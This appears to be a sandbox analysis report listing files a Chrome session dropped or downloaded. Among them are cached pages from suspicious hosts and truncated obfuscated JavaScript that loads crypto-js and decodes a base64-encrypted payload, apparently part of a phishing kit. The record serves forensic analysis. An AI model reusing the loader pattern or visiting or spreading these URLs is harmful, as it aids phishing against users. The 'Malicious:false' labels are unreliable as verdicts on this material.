                    SHA-512:7B382BB74F9AEB3D063937E560FEECE0D95C08D87517243A9DB80FFED6BF7BAB93D32876B7C1473B94520380AA60E5EE68C4B7059EEED01324A1A7D44E30D993
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,......gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2675
                    Entropy (8bit):4.002339247361272
                    Encrypted:false
                    SSDEEP:
                    MD5:9E7E2579C6F467726D1B48507D99A284
                    SHA1:0EF8424DAF8ABF6DF2E8D774E346F3ED9CA6A36B
                    SHA-256:826A48D389D1C21B0BC3873E5C11A8E3416D5A927512B0159B02F2A18B45A2BD
                    SHA-512:9646E1B02DBCC20869F07C5193B78A5527E193A4AC5E84D14378B501531A838B6B8481A98D5E4B82BDD51DE33EB61C138625ED9530E8ED94A089A1B26ED563DC
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....9b.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2689
                    Entropy (8bit):4.007968053809889
                    Encrypted:false
                    SSDEEP:
                    MD5:4F6E0FF4E4C5515AF8AA89F83C5F79DE
                    SHA1:C1E890D9B2900DEC7C8EF50FCBE49AD4938C6E53
                    SHA-256:0266269CE422746D7E033E6B2CC7E8A48B85C989D090FECFA516B1F19ABC1B44
                    SHA-512:79A299B6AA4EF87960985B5A1BC97BE57AEB200961E3004A8F977A3F45B6ABB8E395B968585A9CBC3CD877E41517892F6604E5D7360E62C72EE1E01E19FA378B
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):4.001175090150242
                    Encrypted:false
                    SSDEEP:
                    MD5:6E65FB3E12687ECA2461A1E94BCACC32
                    SHA1:59AD463D9EACADB1341D8067B7112A84CB09D95F
                    SHA-256:914B73742C91724A03DB926F657458A919CBB2375389D790957DC03B147C9E37
                    SHA-512:BDFF6A571BAE479A75C35B35A74E21D6427CF23A39B035A014993AD51F89F83B1A07FC89247BD86F1E4EDB6F3FD2D04122922A0E9DB06C1E4F1B44592EA1E2B5
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....c..gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.988923761568289
                    Encrypted:false
                    SSDEEP:
                    MD5:87450DA112B56D378C610ABE97E4212E
                    SHA1:729C941FE18A2DE052CBFB8D1A1DCFE0D10A65DA
                    SHA-256:3ECE306D86D38685CEC3D6945870E4774DA3FC994C0DAB3471431104E729BEEF
                    SHA-512:9701FFC798DCD7BB3498F050E2FEE6D022A01B0FADCABF5FAEE1C9403D1EBD03D9FA28E9230FA04C04764B6F2F59114817FB4BA70C9F43152A91011112DAA8C6
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....f.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):3.997262963575031
                    Encrypted:false
                    SSDEEP:
                    MD5:FD2A188AB46ED2578B3F3ED8A89C1DC1
                    SHA1:ED75C3816CAD6B628AE8218203330DC2EAEF0386
                    SHA-256:76CA714877DDC27033200CD36BD170FC97F549D5E2AB43873DAD1863587FA627
                    SHA-512:111BCE7AFEF3E8C5ED7D77318D115CFB46CC2AE2C528423584A9E514BC83737F82366556A8A8C4E876B6D8B235CE574C1DB38A36548627A789B8CFC1C1E8F344
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....8K.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                    Chrome Cache Entry: 79

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (18609), with CRLF line terminators
                    Category:dropped
                    Size (bytes):19136
                    Entropy (8bit):5.7106516409455
                    Encrypted:false
                    SSDEEP:
                    MD5:00D0223B5075AA0E77B3052FFB1E8498
                    SHA1:1FAB3E3AA2D7AC73556DAF659E070EFDD769F6AB
                    SHA-256:47BE490B43D527E6934982711B66400A8273A24DFDB98D4A57381725518249BD
                    SHA-512:5B54E905B3290CFABE027376452AAEE17F14AA277493680A632C2F26FD6E05E4D2FCFF7BC4B1838F6DD0BD3AB677C8DAD18D27C2FE6026C83085BE64BEC0F3CB
                    Malicious:false
                    Reputation:unknown
                    Preview:var range= document.createElement("script");..range.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(range);..range.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiWTQxWXMxYk92dzdnQ0djb3RUKzBtQ0MwV0RIVVc4NklCQmlPNUJpVkVpVm5sRVY2djJhckJxZmRhdFZtUEN4MGdNSkNDaXYyZnBnZk51UDE5N1VLb3pxalZFa3hhcWF2dVd2cUJUMnFSQXFaaWlcLzhZdzhyamtNZG1TdHlmYzJJTUtKNXlwcThYRldGQW4yRmM3bGJJTmFLUDRrNVd1cUtlM01OZlFYVzNMUVNrSnFBZmJ5MTlNelFwa3pxYk4xR3VRdTBEVFgzcFBZeWIxRlhVVGJCR2NkaXA3SUYzcVwvK1pnUTJ1dWdjZW9sVkpEQmtEUDlzUyt1TWFjVVlMTGZCQUc3TmNFcmhMYUVsZWNhM2VLOFRpNmF1RUVQbVBaUGVQK29IYTZ5RHdlQXhTbGg4d3UwVHZzV1IwUlRMVzBPaUJYUXFxd0w0a2VzS3pNUDkreU5oZkgzZkdzWVIxa2NNOUdNSlNuYkpsQ0M5OUN2OUp2TGltMW5DWnNaZ1daSUk5c2lLXC9SOW1GQW5HS2tqbHlVV3ZsbkhhUW9TQTBhcTRkQVhCYm1jZ3I4VkVkQWQ3aks5VnZWdW80RUdnbUZseHJKM0tTMjRjRWtSUHQ1VXZrRHVJRTYrNE1YbjJnZXA4WnJKMTlWbWRoNTlqYVBMemVzMGVEVGJtQnRrS0FmcFdyUzVXTE1qUDB6RmlcL280VXMxdTJGUllFRlFyXC9cL1phRlVCbkVJNjZaNUVSZlppRkU

                    Chrome Cache Entry: 80

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2876), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):6018
                    Entropy (8bit):5.736271620667904
                    Encrypted:false
                    SSDEEP:
                    MD5:B831B59B582CED8759F298D93F2D597D
                    SHA1:10EAA78A5C2FBAA0F432BA428129157951474F25
                    SHA-256:6FFD8D57C0DF6209E34C0A97008B426909C060135A7AC3D17FA05FCEE810FB49
                    SHA-512:11A362C4BADAACB66DCF6ABB5745B995FC1E3FFCDD344B72EB64FB3811B1BC1788A5A31CFA777E9528A2AD857E60C33F9DD40D346B8049E344AC9428C298DCC0
                    Malicious:false
                    Reputation:unknown
                    URL:https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/
                    Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#jadedness {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#idealize {width: 130px;margin-top: 179px;}#zigzag {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#zigzag>.faceless {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#zigzag>.earthenware {widt

                    Chrome Cache Entry: 81

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (455), with CRLF line terminators
                    Category:dropped
                    Size (bytes):6938
                    Entropy (8bit):4.7097617678789065
                    Encrypted:false
                    SSDEEP:
                    MD5:0D25225E2A27070AD9D4E0B53A28D91B
                    SHA1:92DF56E11E699E7495672C5FB49DB1F6AE3B2575
                    SHA-256:20416D561B0D2351033DAB9DACEA3BEBCA05A428569C6B8306525B6856F0D1F7
                    SHA-512:6253631EC712487F24ED033C82FEE2BC1F5AB17FCA64D6DA30528F62E905C8BDE8664D9A9C67698035CE5A5E40A70DB499AAF7A2F04D0950FCC4115A925A49DC
                    Malicious:false
                    Reputation:unknown
                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Antique Vehicle Collectors - sparkqueste.com.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP._IPUaxznzi7Hdwfv7Eu0BwHaEo') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;..

                    Chrome Cache Entry: 83

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):61
                    Entropy (8bit):3.990210155325004
                    Encrypted:false
                    SSDEEP:
                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                    Malicious:false
                    Reputation:unknown
                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                    Chrome Cache Entry: 84

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65447)
                    Category:dropped
                    Size (bytes):89501
                    Entropy (8bit):5.289893677458563
                    Encrypted:false
                    SSDEEP:
                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                    Malicious:false
                    Reputation:unknown
                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                    Chrome Cache Entry: 86

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (1329), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):2115
                    Entropy (8bit):5.410624645006145
                    Encrypted:false
                    SSDEEP:
                    MD5:78C30D717A720915DDBC4F6779973C0C
                    SHA1:87306DAB56D0F22299A1B766CD22EED50D08B531
                    SHA-256:0D0ECD3412CA3D47FC9E36B285A512F643DF53FD13E8591B6FEE205866C58B42
                    SHA-512:84893B432056467DD04A47D07A69EC84AD52858413CED88E7FCBEAEB8425719F16D4DA43444FE77D9B0447013F0E9A0C1AF4748D10726BA38A387B10F19ECEC2
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php
                    Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.negate {position: relative;width: 80px;height: 80px;}.negate div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite negate;transform-origin: 40px 40px;}.negate div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.negate div:first-child {animation-delay: -36ms;}.negate div:first-child:after {top: 63px;left: 63px;}.negate div:nth-child(2) {animation-delay: -72ms;}.negate div:nth-child(2):after {top: 68px;left: 56px;}.negate div:nth-child(3) {animation-delay: -108ms;}.negate div:nth-child(3):after {top: 71px;left: 48px;}.negate div:nth-child(4) {animation-delay: -144ms;}

                    Chrome Cache Entry: 87

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 11 x 34, 8-bit/color RGB, non-interlaced
                    Category:downloaded
                    Size (bytes):61
                    Entropy (8bit):4.068159130770306
                    Encrypted:false
                    SSDEEP:
                    MD5:63A63306704B3846628B0B086F501396
                    SHA1:16B4C2DA3D8D428D71FE5740220C45ED4D18CB5E
                    SHA-256:E24EB8D0A4EF95CAF9256EE5436418942813E3DDB962ED19ACFF176A88100DA8
                    SHA-512:03D4F9661D73333E3BBB9482DCEEE464059DF545726B83D96C0C50D92D4AC18FC6D48E48D5AC9458AA8F9D55351D21765D0829CF4A79AB56B3FAC0947492B18A
                    Malicious:false
                    Reputation:unknown
                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8afeaf703f4f4265/1723111499898/E_bN1ZYpaYJfOz0
                    Preview:.PNG........IHDR......."......m......IDAT.....$.....IEND.B`.

                    Chrome Cache Entry: 88

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (18581), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):19122
                    Entropy (8bit):5.705542158565832
                    Encrypted:false
                    SSDEEP:
                    MD5:B8275E53D1EA59765575D558DF8526C0
                    SHA1:470F5168A463EF1B284ADC7941F8A9969459A143
                    SHA-256:95F4AE68628964A5D9324DBCFCCA3E83BBF8040D27E5855A6EB570497F957236
                    SHA-512:6459FD3CDDBE45E562A8BA6EA7CBB094285640D09DD13D29F29C52698A561F683D36E9830DE69A46773545EE256A5B8D512889B2A871F19A0ACA458487CCDCA3
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php?4-797967704b536932307466507a7370495430744a5338346f5338724b7938724f4166494b79347641794e5459784e5459314d6a59794e685572794178506256594c79573154423841-calypso
                    Preview:var establish= document.createElement("script");..establish.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(establish);..establish.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiTDJuVzFYNGw0czZjWDl4dEpJQm1OSGYzS1wvUGNtaGFISGRka3BSZGxWcGJtQ3RXY3VGdmV2bnR2VmJGXC9ZRXRUMGFUdUVZbUVYdk51ek5zXC9EUlR6XC9nVDlzRWlsNEplYWZFdU1xMktcLzE3enBDdVwveTlKOXFzaTViaG1PWVlYUlVXVmxEMThHRzUzSHVJeWF2bU9wV0lXK3lWUmRiblNncEhNNDFRTFNRWVFFMVFwYWFldVhjK0pJVGsxS3FUNFwvRXptMTcyMzlHTTRvMjRXQzVCMGNWVml2b0dFZm45SGFJbHBYMkpMZVpJdncrc1wvY2JBNTltNWtJXC8rV0cyY2NKckRJam11bG1pZTBMNlpvK0VndlZBNWk4UzFZOXdBYm5ERTcxM1NhcE4xSytucFY4RjFrRFBzODlaVHRYM2t6dnVCc1JSRTd5cjBpY1lSU3J0WFwvS0doNXlZeU5iT1NiN1pjMnRHeit1VlB2dUwyYkpQaDBNd0d0K3d5Uk5KTkNtdGlpSE1SV0xaMkoxamtQb3F6b2U4OEtkSEpnZGlPWDA4dkN6V1lHN2FIam1VSmpOMjJydlwvMTcyNERSRE00aTlIU2VsMkNXM2J4MU1OZjhwMFZScG0raCt0cE85QW9oYkREeFp4Q3ZDelp4djRiZzY3NzMrY3NTVWI2ZXB1Q0hxY3JuZit0REJJZ0dIak85TXpEMjRJdVRjRGVMTlZMSDd

                    Chrome Cache Entry: 91

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (44174)
                    Category:downloaded
                    Size (bytes):44175
                    Entropy (8bit):5.377219977973567
                    Encrypted:false
                    SSDEEP:
                    MD5:66E93C1F0C53BB0A4A34C2BE54427E6C
                    SHA1:24346C2941C3D92C9F3634FC594079F4706650F7
                    SHA-256:CE9B46C18D0769C78A7E889EB237606CB96B602061B39B4C1159A22A015B51DF
                    SHA-512:30E800EAA414A0F571E5100B71B19AC23743814A8FD2B7C991DA97FEA844B18F4EF64FC4AA90C3C300CC94F6FF47EA201E410F19F80CEE84D2E307AAA10EF1DE
                    Malicious:false
                    Reputation:unknown
                    URL:https://challenges.cloudflare.com/turnstile/v0/g/769ce3c24a3b/api.js
                    Preview:"use strict";(function(){function Rt(e,n,r,o,c,u,y){try{var _=e[u](y),d=_.value}catch(p){r(p);return}_.done?n(d):Promise.resolve(d).then(o,c)}function It(e){return function(){var n=this,r=arguments;return new Promise(function(o,c){var u=e.apply(n,r);function y(d){Rt(u,o,c,y,_,"next",d)}function _(d){Rt(u,o,c,y,_,"throw",d)}y(void 0)})}}function F(e,n){return n!=null&&typeof Symbol!="undefined"&&n[Symbol.hasInstance]?!!n[Symbol.hasInstance](e):F(e,n)}function Ie(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}function Oe(e){for(var n=1;n<arguments.length;n++){var r=arguments[n]!=null?arguments[n]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Ie(e,c,r[c])})}return e}function gr(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                    Chrome Cache Entry: 93

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (47992), with no line terminators
                    Category:downloaded
                    Size (bytes):47992
                    Entropy (8bit):5.605846858683577
                    Encrypted:false
                    SSDEEP:
                    MD5:CF3402D7483B127DED4069D651EA4A22
                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                    Malicious:false
                    Reputation:unknown
                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
